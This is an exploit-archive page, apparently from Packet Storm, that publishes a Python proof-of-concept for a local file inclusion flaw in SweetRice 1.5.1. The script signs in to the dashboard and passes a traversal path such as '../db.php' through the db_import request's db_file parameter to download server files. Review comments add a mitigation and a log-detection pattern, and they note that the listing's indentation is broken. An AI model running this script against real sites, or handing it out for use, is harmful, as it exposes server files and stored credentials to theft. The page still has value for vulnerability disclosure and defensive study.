SweetRice 1.5.1 Local File Inclusion

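  • SweetRice version 1.5.1 suffers from a local file inclusion vulnerability. In the proof of concept below, the file path is passed in the db_file parameter of the dashboard's db_import request after signing in, so the issue as demonstrated requires valid dashboard credentials.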
    MD5 | fd1b8a05213a6ee380797b66fa596fb7

    ||#/usr/bin/python  
    #-*- Coding: utf-8 -*-  
    # Exploit Title: SweetRice 1.5.1 - Local File Inclusion  
    # Exploit Author: Ashiyane Digital Security Team  
    # Date: 03-11-2016  
    # Vendor: http://www.basic-cms.org/  
    # Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip  
    # Version: 1.5.1  
    # Platform: WebApp - PHP - Mysql  
    import requests  
    import os  
    from requests import session  
    # Console setup only: clear the terminal ('cls' when os.name is 'nt',
    # 'clear' otherwise) and print the ASCII-art banner. Nothing is sent to
    # the network in this part.
    # NOTE(review): indentation was lost in this listing, so the if/else
    # bodies below are no longer nested and the script does not parse as shown.
    if os.name == 'nt':  
    os.system('cls')  
    else:  
    os.system('clear')  
    pass  
    banner = '''  
    +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+  
    |  _________                      __ __________.__                    |  
    | /   _____/_  _  __ ____   _____/  |\______   \__| ____  ____      |  
    | \_____  \\ \/ \/ // __ \_/ __ \   __\       _/  |/ ___\/ __ \     |  
    | /        \\     /\  ___/\  ___/|  | |    |   \  \  \__\  ___/     |  
    |/_______  / \/\_/  \___  >\___  >__| |____|_  /__|\___  >___  >    |  
    |        \/             \/     \/            \/        \/    \/     |  
    |    > SweetRice 1.5.1 Local File Inclusion                            |  
    |    > Script Cod3r : Ehsan Hosseini                                    |  
    +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+  
    '''  
    print(banner)  
    # Read the run parameters interactively: target host, dashboard username
    # and password, the server-side path to request, and the local file name
    # the response is saved under.
    # The script signs in with these credentials before making the file
    # request, so what it demonstrates is reached from a logged-in session.
    # NOTE(review): the interpreter version is not stated on the page; under
    # Python 2, input() evaluates the typed text as an expression.
    host = input("Enter The Target URL(Example : localhost.com) : ")  
    username = input("Enter Username : ")  
    password = input("Enter Password : ")  
    lfipath = input("Enter File To Download(Example : ../db.php) : ")  
    xplfile = input("Enter Name of File To Save(Example : ../db.php) : ")  
    # Form fields posted to the sign-in endpoint; 'rememberMe' is sent empty.
    userinfo = {  
    'user':username,  
    'passwd':password,  
    'rememberMe':''  
    }  
    # Sign in, then request the file through the dashboard's db_import action
    # and save the response body locally.
    # NOTE(review): nesting was lost in this listing; the comments below assume
    # both requests are made inside the with-block so that the session cookies
    # from the sign-in response accompany the later GET. Confirm against an
    # intact copy.
    with session() as r:  
    # Credentials are POSTed to a plain http:// URL, i.e. unencrypted in transit.
    login = r.post('http://' + host + '/as/?type=signin', data=userinfo)  
    success = 'Login success'  
    if login.status_code == 200:  
    print("[+] Sending User&Pass...")  
    # NOTE(review): str.find() returns the match index, so '> 1' treats the
    # marker at index 0 or 1 as a failed login.
    if login.text.find(success) > 1:  
    print("[+] Login Succssfully...")  
    else:  
    print("[-] User or Pass is incorrent...")  
    print("Good Bye...")  
    exit()  
    pass  
    pass  
    # The operator-supplied path is concatenated, without URL encoding, into
    # the db_file query parameter of the db_import request. The page's example
    # value (../db.php) contains a parent-directory component, which is what
    # the advisory describes as the inclusion flaw.
    # Mitigation: the server should reduce db_file to a bare file name and
    # resolve it inside the directory the import feature is meant to read from.
    # Detection: in web access logs, look for type=data&mode=db_import requests
    # whose db_file value contains '../' or any path separator.
    dlfile = r.get('http://' + host +   
    '/as/?type=data&mode=db_import&db_file=' + lfipath + '&form_mode=save')  
    # HTTP 200 is the only success check; the body is saved unexamined, so an
    # error page served with status 200 would be written out as if it were
    # the requested file.
    if dlfile.status_code == 200:  
    print('[+] Exploit...')  
    # Response text is written in text mode to the operator-chosen local path;
    # with plain open()/close() the handle is left open if write() raises.
    file = open(xplfile, "w")  
    file.write(dlfile.text)  
    file.close()  
    print('[+] File Saved...')  
    print('[+] Exploit By Ehsan Hosseini')  
    else:  
    print("[-] Error in Exploting...")  
    pass ||  
    

    Source: packetstormsecurity.com
